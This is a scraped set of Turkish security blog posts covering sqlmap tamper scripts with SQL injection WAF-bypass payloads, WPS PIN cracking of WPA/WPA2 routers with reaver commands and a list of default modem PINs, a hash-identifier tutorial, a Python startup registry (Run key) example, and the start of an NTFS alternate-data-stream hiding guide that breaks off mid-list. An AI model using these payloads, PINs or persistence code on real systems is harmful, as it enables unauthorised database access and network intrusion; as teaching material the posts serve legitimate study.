* Bypass Komutu: value<b>'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa</b><br />
Platform:<br />
* MySQL < 5.1<br />
<br />
<b><span style="color: red;">ifnull2ifisnull.py (“IF(ISNULL(A), B, A)” “IFNULL(A, B)”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>IFNULL(1, 2)</b><br />
* Bypass Komutu: <b>IF(ISNULL(1), 2, 1)</b><br />
Platform:<br />
* MySQL<br />
* SQLite (possibly)<br />
* SAP MaxDB (possibly)<br />
<br />
<b><span style="color: red;">modsecurityversioned.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 AND 2>1--</b><br />
* Bypass Komutu: <b>1 /*!30000AND 2>1*/--</b><br />
Platform:<br />
* MySQL<br />
<br />
<b><span style="color: red;">modsecurityzeroversioned.py (“0000”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 AND 2>1--</b><br />
* Bypass Komutu: <b>1 /*!00000AND 2>1*/--</b><br />
Platform:<br />
* MySQL<br />
<br />
<b><span style="color: red;">multiplespaces.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>UNION SELECT</b><br />
* Bypass Komutu: <b>UNION SELECT</b><br />
<br />
<b><span style="color: red;">nonrecursivereplacement.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 UNION SELECT 2--</b><br />
* Bypass Komutu: <b>1 UNUNIONION SELSELECTECT 2--</b><br />
<br />
<span style="color: red;"><b>percentage.py (“%”)</b></span><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT FIELD FROM TABLE</b><br />
* Bypass Komutu: <b>%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E</b><br />
Platform:<br />
* ASP<br />
<br />
<b><span style="color: red;">randomcase.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>INSERT</b><br />
* Bypass Komutu: <b>InsERt</b><br />
<br />
<b><span style="color: red;">randomcomments.py</span></b><br />
Örnek:<br />
<b>'INSERT' becomes 'IN/**/S/**/ERT'</b><br />
<br />
<b><span style="color: red;">securesphere.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>AND 1=1</b><br />
* Bypass Komutu: <b>AND 1=1 and '0having'='0having'</b><br />
<br />
<b><span style="color: red;">sp_password.py (“sp_password”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 AND 9227=9227--</b><br />
* Bypass Komutu: <b>1 AND 9227=9227--sp_password</b><br />
Platform:<br />
* MSSQL<br />
<br />
<b><span style="color: red;">space2comment.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT id FROM users</b><br />
* Bypass Komutu: <b>SELECT/**/id/**/FROM/**/users</b><br />
<br />
<b><span style="color: red;">space2dash.py (“--”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 AND 9227=9227</b><br />
* Bypass Komutu: <b>1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227</b><br />
Platform:<br />
* MSSQL<br />
* SQLite<br />
<br />
<b><span style="color: red;">space2hash.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 AND 9227=9227</b><br />
* Bypass Komutu: <b>1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227</b><br />
Platform:<br />
* MySQL<br />
<br />
<b><span style="color: red;">space2morehash.py</span></b><br />
Platform:<br />
* MySQL >= 5.1.13<br />
<br />
<b><span style="color: red;">space2mssqlblank.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT id FROM users</b><br />
* Bypass Komutu: <b>SELECT%08id%02FROM%0Fusers</b><br />
Platform:<br />
* Microsoft SQL Server<br />
<br />
<b><span style="color: red;">space2mssqlhash.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 AND 9227=9227</b><br />
* Bypass Komutu: <b>1%23%0A9227=9227</b><br />
Platform:<br />
* MSSQL<br />
* MySQL<br />
<br />
<b><span style="color: red;">space2mysqlblank.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT id FROM users</b><br />
* Bypass Komutu: <b>SELECT%0Bid%0BFROM%A0users</b><br />
Platform:<br />
* MySQL<br />
<br />
<b><span style="color: red;">space2mysqldash.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 AND 9227=9227</b><br />
* Bypass Komutu: <b> 1--%0AAND--%0A9227=9227</b><br />
Platform:<br />
* MySQL<br />
* MSSQL<br />
<br />
<b><span style="color: red;">space2plus.py (“+”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT id FROM users</b><br />
* Bypass Komutu: <b> SELECT+id+FROM+users</b><br />
<br />
<b><span style="color: red;">space2randomblank.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>SELECT id FROM users</b><br />
* Bypass Komutu: <b>SELECTridtFROMnusers</b><br />
<br />
<b><span style="color: red;">unionalltounion.py (“union all” “union”)</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>-1 UNION ALL SELECT</b><br />
* Bypass Komutu: <b>-1 UNION SELECT</b><br />
<br />
<span style="color: red;"><b>unmagicquotes.py (“%bf%27” “--”)</b></span><br />
Örnek:<br />
* Orijinal Komut: <b>1' AND 1=1</b><br />
* Bypass Komutu: <b>1%bf%27 AND 1=1--%20</b><br />
<br />
<b><span style="color: red;">versionedkeywords.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#</b><br />
* Bypass Komutu: <b> 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#</b><br />
Platform:<br />
* MySQL<br />
<br />
<b><span style="color: red;">versionedmorekeywords.py</span></b><br />
Örnek:<br />
* Orijinal Komut: <b>1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#</b><br />
* Bypass Komutu: <b>1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#</b><br />
Platform:<br />
* MySQL >= 5.1.13<br />
<br />
<br /><br />
<b>Genel </b>olarak kullanabileceğiniz <b>tamper </b>listesi:<br />
<br />
<i>apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes</i><br />
<br />
<br />
<b>MSSQL </b>için kullanabileceğiniz <b>tamper </b>listesi:<br />
<br />
<i>between,charencode,charunicodeencode,greatest,multiplespaces,percentage,randomcase,sp_password,space2comment,space2dash,space2mssqlblank,space2plus,space2randomblank,unionalltounion,unmagicquotes</i><br />
<br />
<br />
<b>MYSQL </b>için kullanabileceğiniz <b>tamper </b>listesi:<br />
<br /><i>between,bluecoat,charencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor</i><br />
<br /><br />İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com36tag:blogger.com,1999:blog-925370819781376022.post-21835973234317763212013-06-19T11:47:00.000+03:002018-10-25T15:21:46.589+03:00WPS Desktekli Modemlerde WPA&WPA2 Şifresi Kırma (Videolu Anlatım)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxJjF1BxgIBF8ILwbz8aJ9cyHdp0dKk0hDeVSN68X7V2W3-CmFh7bof1yICXqMYyXYw3ap8eSovWuKMQd0MHeZzKrJFT41AxyKh2xSosVt-wV8oRQm0QFZ99EzskxFKIB3-YyU_7RFmPZL/s1600/WPS.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxJjF1BxgIBF8ILwbz8aJ9cyHdp0dKk0hDeVSN68X7V2W3-CmFh7bof1yICXqMYyXYw3ap8eSovWuKMQd0MHeZzKrJFT41AxyKh2xSosVt-wV8oRQm0QFZ99EzskxFKIB3-YyU_7RFmPZL/s1600/WPS.jpg" /></a></div>
Merhaba arkadaşlar.<br />
Bugünkü konumuz <b>WPS destekli modemlerde WPA ve WPA2 şifresi kırmak</b>..<br />
<br />
Bu konuyla ilgili bir önceki makalemde <a href="http://www.ismailsaygili.com.tr/2012/10/kablosuz-ag-krma-wpa-hacking.html" target="_blank"><b>WPA Hacking</b></a> anlatmıştım farklı yollardan..<br />
<br />
<b><i>WPS Nedir?</i></b><br />
<b>Wi-Fi Protected Setup (WPS)</b>, kablosuz ağın güvenlik ayarlarını hızlı ve kolayca ayarlamak için yapılmış bir sistemdir.<br />
<br />
WPS; kablosuz ağ cihazını ayarlarken, cihaza tanımlanmış PIN numarası yapılandırılmasını sağlar.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqyULVGC2yeUlUJPR-_hKfTzOxzThiXJqCdlZ6WowWA2Rvv0VtY8Li6Vy75-c3y-vGDhOOx5Yd8sktBC2xIYK0wALb3y6DEvpHNLEIUqnB-unDDxS_ZbJNSnrnX68ecOESjWgsz_4p9joO/s1600/WPS-PIN-WLAN-Router.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqyULVGC2yeUlUJPR-_hKfTzOxzThiXJqCdlZ6WowWA2Rvv0VtY8Li6Vy75-c3y-vGDhOOx5Yd8sktBC2xIYK0wALb3y6DEvpHNLEIUqnB-unDDxS_ZbJNSnrnX68ecOESjWgsz_4p9joO/s1600/WPS-PIN-WLAN-Router.jpg" /></a></div>
<br />
Saldırgan kişi, WPS’de bulunan güvenlik zafiyetiyle hedefin PIN numarasını tahmin ederse WPA/WPA2 şifresini kırabilir (ele geçirebilir).<br />
<br />
Hedefteki kişinin WPA/WPA2 şifresi ne kadar karmaşık ve uzun hanelerden olursa olsun, PIN numarası tahmin edildiğinde şifresi kolayca elde edilebilir!<br />
<a name='more'></a>İyi seyirler:<br />
<object height="360" width="640"><param name="movie" value="http://www.youtube.com/v/z97Spk_0R3g?version=3&hl=tr_TR&rel=0"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/z97Spk_0R3g?version=3&hl=tr_TR&rel=0" type="application/x-shockwave-flash" width="640" height="360" allowscriptaccess="always" allowfullscreen="true"></embed></object><br />
<br />
<i>NOT 1:</i> <b># wash -i mon0</b> komutu verildiğinde sonuç alınmazsa veya hatalarla karşılaşılırsa <b># wash -i mon0 -C </b>komutu kullanılabilir.<br />
<br />
<i>NOT 2:</i> Videoda PIN numarası bilinen bir ağa yapılan saldırıydı, fakat PIN numarası bilinmeyen bir kablosuz ağın şifresini bulmaya yönelik kullanılan komut:<br />
<b># reaver -i mon0 -c KANALNO -b BSSIDNO -vv</b><br />
<b><br /></b>
<b><i><span style="color: red;">Markasına göre modemlerin MAC adresleri ve WPS PIN numaraları:</span></i></b><br />
<br />
Modem Marka/Model = D-Link DSL-2640NRU<br />
MAC Adresi = BC:F6:85:XX:XX:XX<br />
WPS PIN = 21464065<br />
<br />
Modem Marka/Model = TP-Link TD8151N<br />
MAC Adresi = F8: D1:11:XX:XX:XX<br />
WPS PIN = 37157852<br />
<br />
Modem Marka/Model = Zyxel P660N-T1A<br />
MAC Adresi = C8:6C:87:XX:XX:XX<br />
WPS PIN = 46971920<br />
<br />
Modem Marka/Model = Everest SG-1550<br />
MAC Adresi = C8:3A:35:XX:XX:XX<br />
WPS PIN = 61888647<br />
<br />
Modem Marka/Model = TP-Link TD854W<br />
MAC Adresi = 90:F6:52:XX:XX:XX<br />
WPS PIN = 03053447<br />
<br />
Modem Marka/Model = Zyxel P-660W-T1<br />
MAC Adresi = 50:67:F0:XX:XX:XX<br />
WPS PIN = 25385793<br />
<br />
Modem Marka/Model = D-Link<br />
MAC Adresi = BC:F6:85:XX:XX:XX<br />
WPS PIN = 21464065<br />
<br />
Modem Marka/Model = D-Link DSL-2640NRU - SMILE ADSL<br />
MAC Adresi = 0:F3: C1:XX:XX:XX<br />
WPS PIN = 17204026<br />
<br />
Modem Marka/Model = NetMASTER Uydunet & CastleNet Technology<br />
WPS PIN = 12345670<br />
<br />
Modem Marka/Model = D-Link DSL-2640NRU<br />
WPS PIN = 68466770<br />
<br />
Modem Marka/Model = Huawei HG253<br />
WPS PIN = 25905892<br />
<br />
Modem Marka/Model = Lokum<br />
WPS PIN = 75777241<br />
<br />
Modem Marka/Model = TP-Link TD-W8151N<br />
MAC Adresi = 90:F6:52:XX:XX:XX<br />
WPS PIN = 32314229<br />
<br />
Modem Marka/Model = TP-Link TD854W<br />
MAC Adresi = 90:F6:52:XX:XX:XX<br />
WPS PIN = 54533233<br />
<br />
Modem Marka/Model = ZTE ZXW10 W300<br />
MAC Adresi = 9C:D2:4B:XX:XX:XX<br />
WPS PIN = 74693085<br />
<br />
Modem Marka/Model = Huawei SuperOnline<br />
MAC Adresi = MAC adresleri değişiklik gösteriyor ama pinler sabittir.<br />
WPS PIN = 25905892<br />
<br />
Modem Marka/Model = ZXV10 W300<br />
MAC Adresi = 9C:D2:4B:XX:XX:XX<br />
Wps Pin: 63943935<br />
<br />
Modem Marka/Model = D-Link<br />
MAC Adresi = CC:B2:55 veya 28:10:7B<br />
WPS PIN = 21464065<br />
<br />
Eğer yukarıda şifresini kırmak istediğiniz modemin markası yok ise modemin MAC adresinin son 6 hanesini (iki noktalar hariç) aşağıdaki sitede aratıp PIN numarasını öğrenebilirsiniz:<br />
http://www.yanghengfei.com/demo/wifi/pin.php<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD2M2cNxE6vQEXMzcY1dtPt14urNlzUQDovuP3tYhuyIoXwka5BKYDrc1TC3MLP9A38evHQ-uHNSeDU709lQy0F0qqccO0fUXdouJ4kJFvmYjM3R-m_a_IL7ULXy7GYQMyVkdYucV2wmbJ/s1600/pin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD2M2cNxE6vQEXMzcY1dtPt14urNlzUQDovuP3tYhuyIoXwka5BKYDrc1TC3MLP9A38evHQ-uHNSeDU709lQy0F0qqccO0fUXdouJ4kJFvmYjM3R-m_a_IL7ULXy7GYQMyVkdYucV2wmbJ/s1600/pin.png" width="400" /></a></div>
<br />
<br />
Kolay gelsin..İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com63tag:blogger.com,1999:blog-925370819781376022.post-20121804164398513072013-05-29T12:08:00.000+03:002018-10-25T15:23:58.270+03:00Şifreleme Türünü Tespit Etme (Hash Identifier)<b>Hash Identifier</b>, kriptolanan hash/şifre algoritmasını tespit eden bir araçtır.<br />
<br />
Tespit edebildiği hash/şifreleme algoritmaları:<br />
<ul>
<li>ADLER-32</li>
<li>CRC-32</li>
<li>CRC-32B</li>
<li>CRC-16</li>
<li>CRC-16-CCITT</li>
<li>DES(Unix)</li>
<li>FCS-16</li>
<li>GHash-32-3</li>
<li>GHash-32-5</li>
<li>GOST R 34.11-94</li>
<li>Haval-160</li>
<li>Haval-192 110080, Haval-224 114080, Haval-256</li>
<li>Lineage II C4</li>
<li>Domain Cached Credentials</li>
<li>XOR-32</li>
<li>MD5(Half)</li>
<li>MD5(Middle)</li>
<li>MySQL</li>
<li>MD5(phpBB3)</li>
<li>MD5(Unix)</li>
<li>MD5(Wordpress)</li>
<li>MD5(APR)</li>
<li>Haval-128</li>
<li>MD2</li>
<li>MD4</li>
<li>MD5</li>
<li>MD5(HMAC(Wordpress))</li>
<li>NTLM</li>
<li>RAdmin v2.x</li>
<li>RipeMD-128</li>
<li>SNEFRU-128</li>
<li>Tiger-128</li>
<li>MySQL5 - SHA-1(SHA-1($pass))</li>
<li>MySQL 160bit - SHA-1(SHA-1($pass))</li>
<li>RipeMD-160</li>
<li>SHA-1</li>
<li>SHA-1(MaNGOS)</li>
<li>Tiger-160</li>
<li>Tiger-192</li>
<li>md5($pass.$salt) - Joomla</li>
<li>SHA-1(Django)</li>
<li>SHA-224</li>
<li>RipeMD-256</li>
<li>SNEFRU-256</li>
<li>md5($pass.$salt) - Joomla</li>
<li>SAM - (LM_hash:NT_hash)</li>
<li>SHA-256(Django)</li>
<li>RipeMD-320</li>
<li>SHA-384</li>
<li>SHA-256</li>
<li>SHA-384(Django)</li>
<li>SHA-512</li>
<li>Whirlpool</li>
</ul>
<h4>
KULLANIMI</h4>
<b>cd /pentest/passwords/hash-identifier</b> komutuyla programın dizinine geçiyoruz ve <b>python hash_id.py</b> komutunu vererek programı çalıştırıyoruz.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU-NO_2zTB_eoJaBs-zlumAQaVTeyMd-MY0oHfDU7kmqMXA_JvMToMMdT8t0tzKY5PPrJTc3Izgpcf7jIV9XNdYeqdFXZ9cNB0jbXQBv6_Euy1QHN_l_-djIY1iDxaZ_C6xRcA-GAGzgvv/s1600/Hash-Identifier1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU-NO_2zTB_eoJaBs-zlumAQaVTeyMd-MY0oHfDU7kmqMXA_JvMToMMdT8t0tzKY5PPrJTc3Izgpcf7jIV9XNdYeqdFXZ9cNB0jbXQBv6_Euy1QHN_l_-djIY1iDxaZ_C6xRcA-GAGzgvv/s320/Hash-Identifier1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Veya<br />
Kısayol olarak <b>ALT + F2</b> ile <b>hash-identifier</b> yazarak programı çalıştırabiliriz.<br />
<br />
<br />
Örnek 1:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW96KKQCp49sOjoWOu6rUHKOi8WIqMiWubSk0EgiCg0gkksMAAZ7c97uYchczWIMc_PJnwrUjwuAr7u7BCpcxsfNMql0JdBz0UC0XiulnsRAh37g0pZY9AH_DprNrqDPogAknapumcjSGu/s1600/Hash-Identifier2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW96KKQCp49sOjoWOu6rUHKOi8WIqMiWubSk0EgiCg0gkksMAAZ7c97uYchczWIMc_PJnwrUjwuAr7u7BCpcxsfNMql0JdBz0UC0XiulnsRAh37g0pZY9AH_DprNrqDPogAknapumcjSGu/s320/Hash-Identifier2.png" width="320" /></a><br />
Programa <b>ce9c4efd5c8ebdf48585071065c9457c6b668bc2</b> hash'ini verdim. Ve algoritmasının <b>SHA-1</b> veya <b>MySQL5 - SHA-1(SHA-1($pass))</b> olduğunu söyledi.<br />
<br />
Örnek 2:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhACUOP-hDoH9URzrvWfEVIQRedADaMb2pUeRfJUQ4rp22_Mo3Pg1e2UjzR5F4EFYdwhzZ3pyZ1kHwpy8GCcSVNs6_IpNBmPZrJujqqFZ6gSCvJJGDQ2LQ6ASZ6d1qQtN_pOysPU4j3caut/s1600/Hash-Identifier3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhACUOP-hDoH9URzrvWfEVIQRedADaMb2pUeRfJUQ4rp22_Mo3Pg1e2UjzR5F4EFYdwhzZ3pyZ1kHwpy8GCcSVNs6_IpNBmPZrJujqqFZ6gSCvJJGDQ2LQ6ASZ6d1qQtN_pOysPU4j3caut/s320/Hash-Identifier3.png" width="320" /></a></div>
<br />
Bu örnekte ise verilen hash algoritmasını joomla hashı olarak tespit ettik.<br />
<br />
İyi çalışmalar.İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com9tag:blogger.com,1999:blog-925370819781376022.post-31867507504569420832013-05-28T11:10:00.001+03:002018-10-25T15:27:27.122+03:00Python ile Regedit İşlemi<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfPtKy1orHVDGwm2YDDw9odUy2ANHV-hRLSJxDtH5zLh5fiTOhA6mO22XFNT0HmrxmqIg2zZkiZMAh1JAFfPUXES8FaM4UsXoEIrbb9oTNFmqpzWJCE_srJQWsc_eFiHWcG_6X5HG7XeP3/s1600/regedit-python.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfPtKy1orHVDGwm2YDDw9odUy2ANHV-hRLSJxDtH5zLh5fiTOhA6mO22XFNT0HmrxmqIg2zZkiZMAh1JAFfPUXES8FaM4UsXoEIrbb9oTNFmqpzWJCE_srJQWsc_eFiHWcG_6X5HG7XeP3/s1600/regedit-python.png" /></a></div>
Merhaba arkadaşlar. Yaklaşık 2 aydır bloğa yeni yazı ekleyemiyorum işlerimin yoğunluğu nedeniyle..<br />
<br />
Bugünkü konumuz Python dili ile yapmış olduğumuz programımızı Windows işletim sisteminin başlangıcına (startup) nasıl ekleriz? Bu konuyu işleyeceğiz.<br />
<br />
Bu işlemi Windows sistemler üzerinde yapacağımız için yeni bir regedit kaydı oluşturmamız gerekiyor.<br />
<br />
Pythonda yeni regedit kaydı oluşturmamızı sağlayan kod şu şekildedir:<br />
<br />
<blockquote class="tr_bq">
<b>key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",<br />0, _winreg.KEY_ALL_ACCESS)</b></blockquote>
<br />
Evet bu komutu kısaca açıklamak gerekirse;<br />
_winreg.OpenKey ile HKEY_CURRENT_USER altında yeni bir regedit kaydı açtık ve parantezler içinde bu kaydın regeditteki konumunu belirttik.<br />
<br />
Daha sonrada aşağıdaki kodu yazmamız gerekiyor;<br />
<blockquote class="tr_bq">
<b>_winreg.SetValueEx(key, "iso", 0, _winreg.REG_SZ, "C:\\python27\python.exe "+ os.getcwdu() + "\\kopyala.py")<br />key.Close()</b></blockquote>
Yukardaki kod ise; oluşturacağımız regedit kaydının değerlerini(value) tanımladık (kayıt ismi=<u>iso</u>).<br />
Sonra olarak da key.Close() ile regedit kaydımızı kapattık.<br />
<br />
<u>NOT:</u> Eğer Python programımızda böyle bir işlem yapacaksak _winreg modülünü import etmemiz gereklidir.<br />
<br />
<br />
Şimdi küçük bir uygulamayla bu konuyu pekiştirelim.<br />
<br />
Örnek Python programımızın görevi şudur:<br />
C:\python27\test.txt konumundaki test.txt dosyasını C:\\Users\\İsmail\\Desktop\\ konumuna yani masaüstüne iso.txt olarak kopyalamak. Kopyalama işlemi ms-dos komutlarıyla yapılmaktadır(copy komutu). Ve İşletim sistemleriyle ilgili işlemlerde Python kodumuza OS modülünü import etmeyi unutmamamız gerekiyor.<br />
<br />
Son olarak bu programdaki en büyük fark şudur ki bu işlem bilgisayar her açıldığında otomatikman gerçekleşmesidir.<br />
<br />
Örnek program kodları:<br />
<a name='more'></a><blockquote>
<span style="color: #990000;"># -*- coding: cp1254 -*-<br />#Coded by iSo<br />#Website: www.ismailsaygili.com.tr<br />#Copyright 2013 ©</span></blockquote>
<blockquote>
<span style="color: orange;">import</span> os,_winreg </blockquote>
<blockquote>
os.system(<span style="color: #6aa84f;">"copy C:\\python27\\test.txt C:\\Users\\İsmail\\Desktop\\iso.txt"</span>) </blockquote>
<blockquote>
key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER,<span style="color: #6aa84f;">"Software\\Microsoft\\Windows\\CurrentVersion\\Run"</span>,<br />
0, _winreg.KEY_ALL_ACCESS) </blockquote>
<blockquote>
_winreg.SetValueEx(key, <span style="color: #6aa84f;">"iso"</span>, 0, _winreg.REG_SZ, <span style="color: #6aa84f;">"C:\\python27\python.exe "</span>+ os.getcwdu() + <span style="color: #6aa84f;">"\\kopyala.py"</span>) </blockquote>
<blockquote>
key.Close()</blockquote>
<br />
Veya kodları <a href="http://yadi.sk/d/Ydm3fDq45FKHJ" target="_blank">indirmek için tıklayın</a> veya <b><a href="https://github.com/TheSaygili/winreg/blob/master/kopyala.py" target="_blank">GitHub</a></b><br />
<br />
Program çalıştıktan sonra:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirXeyXXiYn1TeSfQfHSg_6CT-pKVOSQ8GjZqAe02fhMAxQty8oVgzFLQQHu9LBFiWd1ZzDqUSF5PBW9BzW2gOtC89mOPKE8BTVHhZ_Qff8CbqorxPHkwVpRqF_p-rkE2lKrbShpqdOHjjT/s1600/python-regedit2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirXeyXXiYn1TeSfQfHSg_6CT-pKVOSQ8GjZqAe02fhMAxQty8oVgzFLQQHu9LBFiWd1ZzDqUSF5PBW9BzW2gOtC89mOPKE8BTVHhZ_Qff8CbqorxPHkwVpRqF_p-rkE2lKrbShpqdOHjjT/s320/python-regedit2.png" width="320" /></a></div>
<br />
<br />
İyi çalışmalar..İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com2tag:blogger.com,1999:blog-925370819781376022.post-39046342428974872382013-04-24T11:43:00.002+03:002018-10-25T15:30:51.137+03:00ADS Kullanarak Veri Gizleme ve Steganography Tekniği<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTsEo73HxUoqi7RV4nN_45-26aJy1Ct7Dcu_hL_IeEkYd0cDsIAFE_06JWd5hiXKmICBXfhra_vvhaZmLCmkDjNxeZLWfZBM_yfoDoOlHfKdH5zrNf2zhDQK97-5Ry-GntGbdoTBDF1ltv/s1600/steganography2-300x225.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTsEo73HxUoqi7RV4nN_45-26aJy1Ct7Dcu_hL_IeEkYd0cDsIAFE_06JWd5hiXKmICBXfhra_vvhaZmLCmkDjNxeZLWfZBM_yfoDoOlHfKdH5zrNf2zhDQK97-5Ry-GntGbdoTBDF1ltv/s1600/steganography2-300x225.jpg" /></a></div>
Merhaba, bu yazıda bazı yöntemler kullanarak ‘<b>veri gizleme</b>‘ konusuna değineceğiz.<br />
<br />
<b><i>Alternate Data Streams (ADS) Nedir?</i></b><br />
Alternatif Veri Akışı (Alternate Data Streams – ADS) Microsoft dosya sistemi olan NTFS’nin ortaya çıkışından beri ismi anılan bir terimdir. NTFS dosya sistemi Microsoft mühendisleri tarafından geliştirilirken Macintosh’un eski işletim sistemi olan HDS’i desteklemek amaçlı oluşturulmuştur. HFS çalışma mantığı olarak bir dosyayı iki parçaya bölerek çalışmakta ve dosya ayarlarını gizli olarak orijinal dosyanın içinde tutmaktaydı. Bu desteği NTFS dosya sistemine de entegre etmek isteyen Microsoft aslında hackerların çok fazla kullanacağı bir açığı farkına varmadan oluşturmuştu.<br />
<br />
Bu açık herhangi bir dosyanın içine başka dosya ve dosyalar gizlemeyi sağlıyordu. Günümüzde de en çok kullanılan dosya saklama yöntemi haline geldi. <b>Bu açık sayesinde 1 kb’lık bir metin belgesinin içerisine boyutunu kesinlikle değiştirmeden 100′lerce megabyte veri saklamak mümkün!</b> Veriyi sadece tam olarak hangi isimle nerde olduğunu bilen kişi çalıştırabilir.<br />
<br />
Örneklerle başlayalım;<br />
<br />
<a name='more'></a><b>Bir metin belgesinin içinde gizli başka bir metin belgesi oluşturmak</b><br />
Windows komut satırını (cmd) açınız<br />
<ul>
<li><b>C:\notepad.exe deneme.txt</b><br />(C diskinde deneme.txt isimli bir belge oluşturacaktır, içine herhangi birşeyler yazın ve kaydedin)</li>
</ul>
<ul>
<li><b>C:\notepad.exe deneme.txt:gizli.txt</b><br />(ADS olarak gizli veriyi deneme.txt dosyasının içine yerleştirelim. Notepad bu isimde bir dosya olmadığını ve oluşturmak isteyip istemediğinizi soracaktır. Onaylayarak içine ilk dosyaya yazdığınızdan farklı bir yazı girin, kaydedip kapatın)</li>
</ul>
<ul>
